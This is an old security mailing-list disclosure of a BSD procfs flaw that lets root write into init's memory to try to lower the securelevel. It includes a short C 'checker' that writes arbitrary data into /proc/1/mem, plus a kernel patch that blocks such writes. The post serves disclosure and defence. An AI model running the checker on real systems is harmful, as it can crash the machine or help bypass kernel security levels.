procfs take II

[brian () FIREHOUSE NET (Brian Mitchell)]

There is a slight procfs hole that could allow a intruder to lower the
securelevel. init's memory is not protected, so you can overwrite
data/instructions in init and possibly lower the securelevel (although
panicing the system is much more likely). Enclosed is a vulnerbility
checker:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>

main()
{
        int tqbf=31337;
        int fd;
        int g0nz0;

        if(getuid())
        {
                fprintf(stderr, "this attack needs root\n");
                exit(1);
        }
        fd = open("/proc/1/mem", O_RDWR);
        if(fd < 0)
        {
                fprintf(stderr, "open of /proc/1/mem failed\n");
                exit(2);
        }
        lseek(fd, 0x1000, SEEK_SET);
        g0nz0=write(fd, &tqbf, sizeof(int));
        close(fd);
        if(g0nz0 >= 0)
                fprintf(stderr, "procfs is vulnerable!\n");
        else
                fprintf(stderr, "procfs is not vulnerable!\n");
        printf("returned %d\n", g0nz0);
}


Here is a simple patch, it disallows writes to pid 1's mem node if
securelevel is > 0 (diff is based on 2.2.1 box with the securelevel fix
applied):

*** procfs_mem.c        Sat Sep  6 02:36:39 1997
--- procfs_mem.c.new    Sat Sep  6 02:38:25 1997
***************
*** 316,321 ****
--- 316,325 ----
            !(curp->p_cred->pc_ucred->cr_gid == KMEM_GROUP &&
              uio->uio_rw == UIO_READ))
                return EPERM;
+
+       /* writing to init memory while securelevel > 0 is bad */
+       if(uio->uio_rw == UIO_WRITE && p->p_pid == 1 && securelevel > 0)
+               return EPERM;

        error = procfs_rwmem(p, uio);


Brian Mitchell                                  brian () firehouse net
"BSD code sucks. Of course, everything else sucks far more."
- Theo de Raadt (OpenBSD President)